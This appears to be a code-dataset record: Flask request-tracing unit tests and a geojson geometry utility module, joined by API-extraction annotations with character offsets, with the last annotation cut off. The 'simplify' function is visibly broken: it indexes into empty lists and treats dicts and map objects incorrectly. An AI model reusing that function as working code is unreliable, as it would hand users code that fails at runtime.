# Assert parent and trace id are properly set on the root span
span = self.find_span_by_name(self.get_spans(), 'flask.request')
self.assertEqual(span.trace_id, 678910)
self.assertEqual(span.parent_id, 12345)
# Explicitly enable distributed tracing
with self.override_config('flask', dict(distributed_tracing_enabled=True)):
res = self.client.get('/', headers={
HTTP_HEADER_PARENT_ID: '12345',
HTTP_HEADER_TRACE_ID: '678910',
})
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
# Assert parent and trace id are properly set on the root span
span = self.find_span_by_name(self.get_spans(), 'flask.request')
self.assertEqual(span.trace_id, 678910)
self.assertEqual(span.parent_id, 12345)
# With distributed tracing disabled
with self.override_config('flask', dict(distributed_tracing_enabled=False)):
res = self.client.get('/', headers={
HTTP_HEADER_PARENT_ID: '12345',
HTTP_HEADER_TRACE_ID: '678910',
})
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
# Assert parent and trace id are properly set on the root span
span = self.find_span_by_name(self.get_spans(), 'flask.request')
self.assertNotEqual(span.trace_id, 678910)
self.assertIsNone(span.parent_id)
def test_request_query_string(self):
"""
When making a request
When the request contains a query string
We create the expected spans
"""
@self.app.route('/')
def index():
return 'Hello Flask', 200
res = self.client.get('/', query_string=dict(hello='flask'))
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'Hello Flask')
spans = self.get_spans()
self.assertEqual(len(spans), 8)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'tests.contrib.flask.test_request.index',
'flask.process_response',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
# Assert span services
for span in spans:
self.assertEqual(span.service, 'flask')
# Root request span
req_span = spans[0]
self.assertEqual(req_span.service, 'flask')
self.assertEqual(req_span.name, 'flask.request')
# Note: contains no query string
self.assertEqual(req_span.resource, 'GET /')
self.assertEqual(req_span.span_type, 'web')
self.assertEqual(req_span.error, 0)
self.assertIsNone(req_span.parent_id)
# Request tags
self.assertEqual(req_span.get_tag('flask.endpoint'), 'index')
# Note: contains no query string
self.assertEqual(req_span.get_tag('flask.url_rule'), '/')
self.assertEqual(req_span.get_tag('http.method'), 'GET')
# Note: contains no query string
self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/')
assert_span_http_status_code(req_span, 200)
# Handler span
handler_span = spans[4]
self.assertEqual(handler_span.service, 'flask')
self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.index')
# Note: contains no query string
self.assertEqual(handler_span.resource, '/')
self.assertEqual(req_span.error, 0)
def test_request_unicode(self):
"""
When making a request
When the url contains unicode
We create the expected spans
"""
@self.app.route(u'/üŋïĉóđē')
def unicode():
return 'üŋïĉóđē', 200
res = self.client.get(u'/üŋïĉóđē')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data, b'\xc3\xbc\xc5\x8b\xc3\xaf\xc4\x89\xc3\xb3\xc4\x91\xc4\x93')
spans = self.get_spans()
self.assertEqual(len(spans), 8)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'tests.contrib.flask.test_request.unicode',
'flask.process_response',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
# Assert span services
for span in spans:
self.assertEqual(span.service, 'flask')
# Root request span
req_span = spans[0]
self.assertEqual(req_span.service, 'flask')
self.assertEqual(req_span.name, 'flask.request')
self.assertEqual(req_span.resource, u'GET /üŋïĉóđē')
self.assertEqual(req_span.span_type, 'web')
self.assertEqual(req_span.error, 0)
self.assertIsNone(req_span.parent_id)
# Request tags
self.assertEqual(req_span.get_tag('flask.endpoint'), 'unicode')
self.assertEqual(req_span.get_tag('flask.url_rule'), u'/üŋïĉóđē')
self.assertEqual(req_span.get_tag('http.method'), 'GET')
self.assertEqual(req_span.get_tag(http.URL), u'http://localhost/üŋïĉóđē')
assert_span_http_status_code(req_span, 200)
# Handler span
handler_span = spans[4]
self.assertEqual(handler_span.service, 'flask')
self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.unicode')
self.assertEqual(handler_span.resource, u'/üŋïĉóđē')
self.assertEqual(req_span.error, 0)
def test_request_404(self):
"""
When making a request
When the requested endpoint was not found
We create the expected spans
"""
res = self.client.get('/not-found')
self.assertEqual(res.status_code, 404)
spans = self.get_spans()
self.assertEqual(len(spans), 9)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'flask.handle_user_exception',
'flask.handle_http_exception',
'flask.process_response',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
# Assert span services
for span in spans:
self.assertEqual(span.service, 'flask')
# Root request span
req_span = spans[0]
self.assertEqual(req_span.service, 'flask')
self.assertEqual(req_span.name, 'flask.request')
self.assertEqual(req_span.resource, 'GET 404')
self.assertEqual(req_span.span_type, 'web')
self.assertEqual(req_span.error, 0)
self.assertIsNone(req_span.parent_id)
# Request tags
self.assertEqual(req_span.get_tag('http.method'), 'GET')
self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/not-found')
assert_span_http_status_code(req_span, 404)
# Dispatch span
dispatch_span = spans[3]
self.assertEqual(dispatch_span.service, 'flask')
self.assertEqual(dispatch_span.name, 'flask.dispatch_request')
self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')
self.assertEqual(dispatch_span.error, 1)
self.assertTrue(dispatch_span.get_tag('error.msg').startswith('404 Not Found'))
self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound')
def test_request_abort_404(self):
"""
When making a request
When the requested endpoint calls `abort(404)`
We create the expected spans
"""
@self.app.route('/not-found')
def not_found():
abort(404)
res = self.client.get('/not-found')
self.assertEqual(res.status_code, 404)
spans = self.get_spans()
self.assertEqual(len(spans), 10)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'tests.contrib.flask.test_request.not_found',
'flask.handle_user_exception',
'flask.handle_http_exception',
'flask.process_response',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
# Assert span services
for span in spans:
self.assertEqual(span.service, 'flask')
# Root request span
req_span = spans[0]
self.assertEqual(req_span.service, 'flask')
self.assertEqual(req_span.name, 'flask.request')
self.assertEqual(req_span.resource, 'GET /not-found')
self.assertEqual(req_span.span_type, 'web')
self.assertEqual(req_span.error, 0)
self.assertIsNone(req_span.parent_id)
# Request tags
self.assertEqual(req_span.get_tag('http.method'), 'GET')
self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/not-found')
assert_span_http_status_code(req_span, 404)
self.assertEqual(req_span.get_tag('flask.endpoint'), 'not_found')
self.assertEqual(req_span.get_tag('flask.url_rule'), '/not-found')
# Dispatch span
dispatch_span = spans[3]
self.assertEqual(dispatch_span.service, 'flask')
self.assertEqual(dispatch_span.name, 'flask.dispatch_request')
self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')
self.assertEqual(dispatch_span.error, 1)
self.assertTrue(dispatch_span.get_tag('error.msg').startswith('404 Not Found'))
self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound')
# Handler span
handler_span = spans[4]
self.assertEqual(handler_span.service, 'flask')
self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.not_found')
self.assertEqual(handler_span.resource, '/not-found')
self.assertEqual(handler_span.error, 1)
self.assertTrue(handler_span.get_tag('error.msg').startswith('404 Not Found'))
self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(handler_span.get_tag('error.type'), 'werkzeug.exceptions.NotFound')
def test_request_500(self):
"""
When making a request
When the requested endpoint raises an exception
We create the expected spans
"""
@self.app.route('/500')
def fivehundred():
raise Exception('500 error')
res = self.client.get('/500')
self.assertEqual(res.status_code, 500)
spans = self.get_spans()
self.assertEqual(len(spans), 9)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'tests.contrib.flask.test_request.fivehundred',
'flask.handle_user_exception',
'flask.handle_exception',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
# Assert span services
for span in spans:
self.assertEqual(span.service, 'flask')
# Root request span
req_span = spans[0]
self.assertEqual(req_span.service, 'flask')
self.assertEqual(req_span.name, 'flask.request')
self.assertEqual(req_span.resource, 'GET /500')
self.assertEqual(req_span.span_type, 'web')
self.assertEqual(req_span.error, 1)
self.assertIsNone(req_span.parent_id)
# Request tags
self.assertEqual(req_span.get_tag('http.method'), 'GET')
self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/500')
assert_span_http_status_code(req_span, 500)
self.assertEqual(req_span.get_tag('flask.endpoint'), 'fivehundred')
self.assertEqual(req_span.get_tag('flask.url_rule'), '/500')
# Dispatch span
dispatch_span = spans[3]
self.assertEqual(dispatch_span.service, 'flask')
self.assertEqual(dispatch_span.name, 'flask.dispatch_request')
self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')
self.assertEqual(dispatch_span.error, 1)
self.assertTrue(dispatch_span.get_tag('error.msg').startswith('500 error'))
self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(dispatch_span.get_tag('error.type'), base_exception_name)
# Handler span
handler_span = spans[4]
self.assertEqual(handler_span.service, 'flask')
self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.fivehundred')
self.assertEqual(handler_span.resource, '/500')
self.assertEqual(handler_span.error, 1)
self.assertTrue(handler_span.get_tag('error.msg').startswith('500 error'))
self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(handler_span.get_tag('error.type'), base_exception_name)
# User exception span
user_ex_span = spans[5]
self.assertEqual(user_ex_span.service, 'flask')
self.assertEqual(user_ex_span.name, 'flask.handle_user_exception')
self.assertEqual(user_ex_span.resource, 'flask.handle_user_exception')
self.assertEqual(user_ex_span.error, 1)
self.assertTrue(user_ex_span.get_tag('error.msg').startswith('500 error'))
self.assertTrue(user_ex_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(user_ex_span.get_tag('error.type'), base_exception_name)
def test_request_501(self):
"""
When making a request
When the requested endpoint calls `abort(501)`
We create the expected spans
"""
@self.app.route('/501')
def fivehundredone():
abort(501)
res = self.client.get('/501')
self.assertEqual(res.status_code, 501)
spans = self.get_spans()
self.assertEqual(len(spans), 10)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'tests.contrib.flask.test_request.fivehundredone',
'flask.handle_user_exception',
'flask.handle_http_exception',
'flask.process_response',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
# Assert span services
for span in spans:
self.assertEqual(span.service, 'flask')
# Root request span
req_span = spans[0]
self.assertEqual(req_span.service, 'flask')
self.assertEqual(req_span.name, 'flask.request')
self.assertEqual(req_span.resource, 'GET /501')
self.assertEqual(req_span.span_type, 'web')
self.assertEqual(req_span.error, 1)
self.assertIsNone(req_span.parent_id)
# Request tags
self.assertEqual(req_span.get_tag('http.method'), 'GET')
self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/501')
assert_span_http_status_code(req_span, 501)
self.assertEqual(req_span.get_tag('flask.endpoint'), 'fivehundredone')
self.assertEqual(req_span.get_tag('flask.url_rule'), '/501')
# Dispatch span
dispatch_span = spans[3]
self.assertEqual(dispatch_span.service, 'flask')
self.assertEqual(dispatch_span.name, 'flask.dispatch_request')
self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')
self.assertEqual(dispatch_span.error, 1)
self.assertTrue(dispatch_span.get_tag('error.msg').startswith('501 Not Implemented'))
self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(dispatch_span.get_tag('error.type'), 'werkzeug.exceptions.NotImplemented')
# Handler span
handler_span = spans[4]
self.assertEqual(handler_span.service, 'flask')
self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.fivehundredone')
self.assertEqual(handler_span.resource, '/501')
self.assertEqual(handler_span.error, 1)
self.assertTrue(handler_span.get_tag('error.msg').startswith('501 Not Implemented'))
self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(handler_span.get_tag('error.type'), 'werkzeug.exceptions.NotImplemented')
# User exception span
user_ex_span = spans[5]
self.assertEqual(user_ex_span.service, 'flask')
self.assertEqual(user_ex_span.name, 'flask.handle_user_exception')
self.assertEqual(user_ex_span.resource, 'flask.handle_user_exception')
self.assertEqual(user_ex_span.error, 0)
def test_request_error_handler(self):
"""
When making a request
When the requested endpoint raises an exception
We create the expected spans
"""
@self.app.errorhandler(500)
def error_handler(e):
return 'Whoops', 500
@self.app.route('/500')
def fivehundred():
raise Exception('500 error')
res = self.client.get('/500')
self.assertEqual(res.status_code, 500)
self.assertEqual(res.data, b'Whoops')
spans = self.get_spans()
if flask_version >= (0, 12, 0):
self.assertEqual(len(spans), 11)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'tests.contrib.flask.test_request.fivehundred',
'flask.handle_user_exception',
'flask.handle_exception',
'tests.contrib.flask.test_request.error_handler',
'flask.process_response',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
else:
self.assertEqual(len(spans), 10)
# Assert the order of the spans created
self.assertListEqual(
[
'flask.request',
'flask.try_trigger_before_first_request_functions',
'flask.preprocess_request',
'flask.dispatch_request',
'tests.contrib.flask.test_request.fivehundred',
'flask.handle_user_exception',
'flask.handle_exception',
'tests.contrib.flask.test_request.error_handler',
'flask.do_teardown_request',
'flask.do_teardown_appcontext',
],
[s.name for s in spans],
)
# Assert span services
for span in spans:
self.assertEqual(span.service, 'flask')
# Root request span
req_span = spans[0]
self.assertEqual(req_span.service, 'flask')
self.assertEqual(req_span.name, 'flask.request')
self.assertEqual(req_span.resource, 'GET /500')
self.assertEqual(req_span.span_type, 'web')
self.assertEqual(req_span.error, 1)
self.assertIsNone(req_span.parent_id)
# Request tags
self.assertEqual(req_span.get_tag('http.method'), 'GET')
self.assertEqual(req_span.get_tag(http.URL), 'http://localhost/500')
assert_span_http_status_code(req_span, 500)
self.assertEqual(req_span.get_tag('flask.endpoint'), 'fivehundred')
self.assertEqual(req_span.get_tag('flask.url_rule'), '/500')
# Dispatch span
dispatch_span = spans[3]
self.assertEqual(dispatch_span.service, 'flask')
self.assertEqual(dispatch_span.name, 'flask.dispatch_request')
self.assertEqual(dispatch_span.resource, 'flask.dispatch_request')
self.assertEqual(dispatch_span.error, 1)
self.assertTrue(dispatch_span.get_tag('error.msg').startswith('500 error'))
self.assertTrue(dispatch_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(dispatch_span.get_tag('error.type'), base_exception_name)
# Handler span
handler_span = spans[4]
self.assertEqual(handler_span.service, 'flask')
self.assertEqual(handler_span.name, 'tests.contrib.flask.test_request.fivehundred')
self.assertEqual(handler_span.resource, '/500')
self.assertEqual(handler_span.error, 1)
self.assertTrue(handler_span.get_tag('error.msg').startswith('500 error'))
self.assertTrue(handler_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(handler_span.get_tag('error.type'), base_exception_name)
# User exception span
user_ex_span = spans[5]
self.assertEqual(user_ex_span.service, 'flask')
self.assertEqual(user_ex_span.name, 'flask.handle_user_exception')
self.assertEqual(user_ex_span.resource, 'flask.handle_user_exception')
self.assertEqual(user_ex_span.error, 1)
self.assertTrue(user_ex_span.get_tag('error.msg').startswith('500 error'))
self.assertTrue(user_ex_span.get_tag('error.stack').startswith('Traceback'))
self.assertEqual(user_ex_span.get_tag('error.type'), base_exception_name)
| [
"flask.abort"
] | [((16267, 16277), 'flask.abort', 'abort', (['(404)'], {}), '(404)\n', (16272, 16277), False, 'from flask import abort\n'), ((22922, 22932), 'flask.abort', 'abort', (['(501)'], {}), '(501)\n', (22927, 22932), False, 'from flask import abort\n')] |
__doc__ = 'github: https://github.com/brandonxiang/geojson-python-utils'
import math
from coordTransform_utils import wgs84togcj02
from coordTransform_utils import gcj02tobd09
def linestrings_intersect(line1, line2):
"""
To valid whether linestrings from geojson are intersected with each other.
reference: http://www.kevlindev.com/gui/math/intersection/Intersection.js
Keyword arguments:
line1 -- first line geojson object
line2 -- second line geojson object
if(line1 intersects with other) return intersect point array else empty array
"""
intersects = []
for i in range(0, len(line1['coordinates']) - 1):
for j in range(0, len(line2['coordinates']) - 1):
a1_x = line1['coordinates'][i][1]
a1_y = line1['coordinates'][i][0]
a2_x = line1['coordinates'][i + 1][1]
a2_y = line1['coordinates'][i + 1][0]
b1_x = line2['coordinates'][j][1]
b1_y = line2['coordinates'][j][0]
b2_x = line2['coordinates'][j + 1][1]
b2_y = line2['coordinates'][j + 1][0]
ua_t = (b2_x - b1_x) * (a1_y - b1_y) - \
(b2_y - b1_y) * (a1_x - b1_x)
ub_t = (a2_x - a1_x) * (a1_y - b1_y) - \
(a2_y - a1_y) * (a1_x - b1_x)
u_b = (b2_y - b1_y) * (a2_x - a1_x) - (b2_x - b1_x) * (a2_y - a1_y)
if not u_b == 0:
u_a = ua_t / u_b
u_b = ub_t / u_b
if 0 <= u_a and u_a <= 1 and 0 <= u_b and u_b <= 1:
intersects.append({'type': 'Point', 'coordinates': [
a1_x + u_a * (a2_x - a1_x), a1_y + u_a * (a2_y - a1_y)]})
# if len(intersects) == 0:
# intersects = False
return intersects
def _bbox_around_polycoords(coords):
"""
bounding box
"""
x_all = []
y_all = []
for first in coords[0]:
x_all.append(first[1])
y_all.append(first[0])
return [min(x_all), min(y_all), max(x_all), max(y_all)]
def _point_in_bbox(point, bounds):
"""
valid whether the point is inside the bounding box
"""
return not(point['coordinates'][1] < bounds[0] or point['coordinates'][1] > bounds[2]
or point['coordinates'][0] < bounds[1] or point['coordinates'][0] > bounds[3])
def _pnpoly(x, y, coords):
"""
the algorithm to judge whether the point is located in polygon
reference: https://www.ecse.rpi.edu/~wrf/Research/Short_Notes/pnpoly.html#Explanation
"""
vert = [[0, 0]]
for coord in coords:
for node in coord:
vert.append(node)
vert.append(coord[0])
vert.append([0, 0])
inside = False
i = 0
j = len(vert) - 1
while i < len(vert):
if ((vert[i][0] > y) != (vert[j][0] > y)) and (x < (vert[j][1] - vert[i][1])
* (y - vert[i][0]) / (vert[j][0] - vert[i][0]) + vert[i][1]):
inside = not inside
j = i
i += 1
return inside
def _point_in_polygon(point, coords):
inside_box = False
for coord in coords:
if inside_box:
break
if _point_in_bbox(point, _bbox_around_polycoords(coord)):
inside_box = True
if not inside_box:
return False
inside_poly = False
for coord in coords:
if inside_poly:
break
if _pnpoly(point['coordinates'][1], point['coordinates'][0], coord):
inside_poly = True
return inside_poly
def point_in_polygon(point, poly):
"""
valid whether the point is located in a polygon
Keyword arguments:
point -- point geojson object
poly -- polygon geojson object
if(point inside poly) return true else false
"""
coords = [poly['coordinates']] if poly[
'type'] == 'Polygon' else poly['coordinates']
return _point_in_polygon(point, coords)
def point_in_multipolygon(point, multipoly):
"""
valid whether the point is located in a mulitpolygon (donut polygon is not supported)
Keyword arguments:
point -- point geojson object
multipoly -- multipolygon geojson object
if(point inside multipoly) return true else false
"""
coords_array = [multipoly['coordinates']] if multipoly[
'type'] == "MultiPolygon" else multipoly['coordinates']
for coords in coords_array:
if _point_in_polygon(point, coords):
return True
return False
def number2radius(number):
"""
convert degree into radius
Keyword arguments:
number -- degree
return radius
"""
return number * math.pi / 180
def number2degree(number):
"""
convert radius into degree
Keyword arguments:
number -- radius
return degree
"""
return number * 180 / math.pi
def draw_circle(radius_in_meters, center_point, steps=15):
"""
get a circle shape polygon based on centerPoint and radius
Keyword arguments:
point1 -- point one geojson object
point2 -- point two geojson object
if(point inside multipoly) return true else false
"""
steps = steps if steps > 15 else 15
center = [center_point['coordinates'][1], center_point['coordinates'][0]]
dist = (radius_in_meters / 1000) / 6371
# convert meters to radiant
rad_center = [number2radius(center[0]), number2radius(center[1])]
# 15 sided circle
poly = []
for step in range(0, steps):
brng = 2 * math.pi * step / steps
lat = math.asin(math.sin(rad_center[0]) * math.cos(dist) +
math.cos(rad_center[0]) * math.sin(dist) * math.cos(brng))
lng = rad_center[1] + math.atan2(math.sin(brng) * math.sin(dist)
* math.cos(rad_center[0]), math.cos(dist) - math.sin(rad_center[0]) * math.sin(lat))
poly.append([number2degree(lng), number2degree(lat)])
return {"type": "Polygon", "coordinates": [poly]}
def rectangle_centroid(rectangle):
"""
get the centroid of the rectangle
Keyword arguments:
rectangle -- polygon geojson object
return centroid
"""
bbox = rectangle['coordinates'][0]
xmin = bbox[0][0]
ymin = bbox[0][1]
xmax = bbox[2][0]
ymax = bbox[2][1]
xwidth = xmax - xmin
ywidth = ymax - ymin
return {'type': 'Point', 'coordinates': [xmin + xwidth / 2, ymin + ywidth / 2]}
def point_distance(point1, point2):
"""
calculate the distance between two point on the sphere like google map
reference http://www.movable-type.co.uk/scripts/latlong.html
Keyword arguments:
point1 -- point one geojson object
point2 -- point two geojson object
if(point inside multipoly) return true else false
"""
lon1 = point1['coordinates'][0]
lat1 = point1['coordinates'][1]
lon2 = point2['coordinates'][0]
lat2 = point2['coordinates'][1]
deg_lat = number2radius(lat2 - lat1)
deg_lon = number2radius(lon2 - lon1)
a = math.pow(math.sin(deg_lat / 2), 2) + math.cos(number2radius(lat1)) * \
math.cos(number2radius(lat2)) * math.pow(math.sin(deg_lon / 2), 2)
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
return (6371 * c) * 1000
def geometry_within_radius(geometry, center, radius):
"""
To valid whether point or linestring or polygon is inside a radius around a center
Keyword arguments:
geometry -- point/linstring/polygon geojson object
center -- point geojson object
radius -- radius
if(geometry inside radius) return true else false
"""
if geometry['type'] == 'Point':
return point_distance(geometry, center) <= radius
elif geometry['type'] == 'LineString' or geometry['type'] == 'Polygon':
point = {}
# it's enough to check the exterior ring of the Polygon
coordinates = geometry['coordinates'][0] if geometry['type'] == 'Polygon' else geometry['coordinates']
for coordinate in coordinates:
point['coordinates'] = coordinate
if point_distance(point, center) > radius:
return False
return True
def area(poly):
"""
calculate the area of polygon
Keyword arguments:
poly -- polygon geojson object
return polygon area
"""
poly_area = 0
# TODO: polygon holes at coordinates[1]
points = poly['coordinates'][0]
j = len(points) - 1
count = len(points)
for i in range(0, count):
p1_x = points[i][1]
p1_y = points[i][0]
p2_x = points[j][1]
p2_y = points[j][0]
poly_area += p1_x * p2_y
poly_area -= p1_y * p2_x
j = i
poly_area /= 2
return poly_area
def centroid(poly):
"""
get the centroid of polygon
adapted from http://paulbourke.net/geometry/polyarea/javascript.txt
Keyword arguments:
poly -- polygon geojson object
return polygon centroid
"""
f_total = 0
x_total = 0
y_total = 0
# TODO: polygon holes at coordinates[1]
points = poly['coordinates'][0]
j = len(points) - 1
count = len(points)
for i in range(0, count):
p1_x = points[i][1]
p1_y = points[i][0]
p2_x = points[j][1]
p2_y = points[j][0]
f_total = p1_x * p2_y - p2_x * p1_y
x_total += (p1_x + p2_x) * f_total
y_total += (p1_y + p2_y) * f_total
j = i
six_area = area(poly) * 6
return {'type': 'Point', 'coordinates': [y_total / six_area, x_total / six_area]}
def destination_point(point, brng, dist):
"""
Calculate a destination Point base on a base point and a distance
Keyword arguments:
pt -- polygon geojson object
brng -- an angle in degrees
dist -- distance in Kilometer between destination and base point
return destination point object
"""
dist = float(dist) / 6371 # convert dist to angular distance in radians
brng = number2radius(brng)
lon1 = number2radius(point['coordinates'][0])
lat1 = number2radius(point['coordinates'][1])
lat2 = math.asin(math.sin(lat1) * math.cos(dist) +
math.cos(lat1) * math.sin(dist) * math.cos(brng))
lon2 = lon1 + math.atan2(math.sin(brng) * math.sin(dist) *
math.cos(lat1), math.cos(dist) - math.sin(lat1) * math.sin(lat2))
lon2 = (lon2 + 3 * math.pi) % (2 * math.pi) - math.pi # normalise to -180 degree +180 degree
return {'type': 'Point', 'coordinates': [number2degree(lon2), number2degree(lat2)]}
def simplify(source, kink=20):
"""
source[] array of geojson points
kink in metres, kinks above this depth kept
kink depth is the height of the triangle abc where a-b and b-c are two consecutive line segments
"""
source_coord = map(lambda o: {"lng": o.coordinates[0], "lat": o.coordinates[1]}, source)
# count, n_stack, n_dest, start, end, i, sig;
# dev_sqr, max_dev_sqr, band_sqr;
# x12, y12, d12, x13, y13, d13, x23, y23, d23;
F = (math.pi / 180.0) * 0.5
index = [] # aray of indexes of source points to include in the reduced line
sig_start = [] # indices of start & end of working section
sig_end = []
# check for simple cases
count = len(source_coord)
if count < 3:
return source_coord # one or two points
# more complex case. initialize stack
band_sqr = kink * 360.0 / (2.0 * math.pi * 6378137.0) # Now in degrees
band_sqr *= band_sqr
n_dest = 0
sig_start[0] = 0
sig_end[0] = count - 1
n_stack = 1
# while the stack is not empty
while n_stack > 0:
# ... pop the top-most entries off the stacks
start = sig_start[n_stack - 1]
end = sig_end[n_stack - 1]
n_stack -= 1
if (end - start) > 1: #any intermediate points ?
# ... yes, so find most deviant intermediate point to either side of line joining start & end points
x12 = source[end]["lng"] - source[start]["lng"]
y12 = source[end]["lat"] - source[start]["lat"]
if math.fabs(x12) > 180.0:
x12 = 360.0 - math.fabs(x12)
x12 *= math.cos(F * (source[end]["lat"] + source[start]["lat"])) # use avg lat to reduce lng
d12 = (x12 * x12) + (y12 * y12)
i = start + 1
sig = start
max_dev_sqr = -1.0
while i < end:
x13 = source[i]["lng"] - source[start]["lng"]
y13 = source[i]["lat"] - source[start]["lat"]
if math.fabs(x13) > 180.0:
x13 = 360.0 - math.fabs(x13)
x13 *= math.cos(F * (source[i]["lat"] + source[start]["lat"]))
d13 = (x13 * x13) + (y13 * y13)
x23 = source[i]["lng"] - source[end]["lng"]
y23 = source[i]["lat"] - source[end]["lat"]
if math.fabs(x23) > 180.0:
x23 = 360.0 - math.fabs(x23)
x23 *= math.cos(F * (source[i]["lat"] + source[end]["lat"]))
d23 = (x23 * x23) + (y23 * y23)
if d13 >= (d12 + d23):
dev_sqr = d23
elif d23 >= (d12 + d13):
dev_sqr = d13
else:
dev_sqr = (x13 * y12 - y13 * x12) * (x13 * y12 - y13 * x12) / d12 # solve triangle
if dev_sqr > max_dev_sqr:
sig = i
max_dev_sqr = dev_sqr
i += 1
if max_dev_sqr < band_sqr: # is there a sig. intermediate point ?
#... no, so transfer current start point
index[n_dest] = start
n_dest += 1
else: # ... yes, so push two sub-sections on stack for further processing
n_stack += 1
sig_start[n_stack - 1] = sig
sig_end[n_stack - 1] = end
n_stack += 1
sig_start[n_stack - 1] = start
sig_end[n_stack - 1] = sig
else: # ... no intermediate points, so transfer current start point
index[n_dest] = start
n_dest += 1
# transfer last point
index[n_dest] = count - 1
n_dest += 1
# make return array
r = []
for i in range(0, n_dest):
r.append(source_coord[index[i]])
return map(lambda o: {"type": "Point","coordinates": [o.lng, o.lat]}, r)
def wgs2gcj(geometry):
"""
convert wgs84 to gcj
referencing by https://github.com/wandergis/coordTransform_py
"""
# TODO: point linestring point
if geometry['type'] == 'MultiLineString':
coordinates = geometry['coordinates']
for lines in coordinates:
for line in lines:
line[0], line[1] = wgs84togcj02(line[0], line[1])
return geometry
def gcj2bd(geometry):
"""
convert gcj to bd
referencing by https://github.com/wandergis/coordTransform_py
"""
# TODO: point linestring point
if geometry['type'] == 'MultiLineString':
coordinates = geometry['coordinates']
for lines in coordinates:
for line in lines:
line[0], line[1] = gcj02tobd09(line[0], line[1])
return geometry
| [
"coordTransform_utils.gcj02tobd09",
"math.sqrt",
"coordTransform_utils.wgs84togcj02",
"math.cos",
"math.fabs",
"math.sin"
] | [((7021, 7042), 'math.sin', 'math.sin', (['(deg_lat / 2)'], {}), '(deg_lat / 2)\n', (7029, 7042), False, 'import math\n'), ((7181, 7193), 'math.sqrt', 'math.sqrt', (['a'], {}), '(a)\n', (7190, 7193), False, 'import math\n'), ((7195, 7211), 'math.sqrt', 'math.sqrt', (['(1 - a)'], {}), '(1 - a)\n', (7204, 7211), False, 'import math\n'), ((12146, 12203), 'math.cos', 'math.cos', (["(F * (source[end]['lat'] + source[start]['lat']))"], {}), "(F * (source[end]['lat'] + source[start]['lat']))\n", (12154, 12203), False, 'import math\n'), ((7132, 7153), 'math.sin', 'math.sin', (['(deg_lon / 2)'], {}), '(deg_lon / 2)\n', (7140, 7153), False, 'import math\n'), ((10081, 10095), 'math.sin', 'math.sin', (['lat1'], {}), '(lat1)\n', (10089, 10095), False, 'import math\n'), ((10098, 10112), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\n', (10106, 10112), False, 'import math\n'), ((10170, 10184), 'math.cos', 'math.cos', (['brng'], {}), '(brng)\n', (10178, 10184), False, 'import math\n'), ((10278, 10292), 'math.cos', 'math.cos', (['lat1'], {}), '(lat1)\n', (10286, 10292), False, 'import math\n'), ((10294, 10308), 'math.cos', 'math.cos', (['dist'], {}), '(dist)\n', (10302, 10308), False, 'import math\n'), ((12058, 12072), 'math.fabs', 'math.fabs', (['x12'], {}), '(x12)\n', (12067, 12072), False, 'import math\n'), ((12624, 12679), 'math.cos', 'math.cos', (["(F * (source[i]['lat'] + source[start]['lat']))"], {}), "(F * (source[i]['lat'] + source[start]['lat']))\n", (12632, 12679), False, 'import math\n'), ((12963, 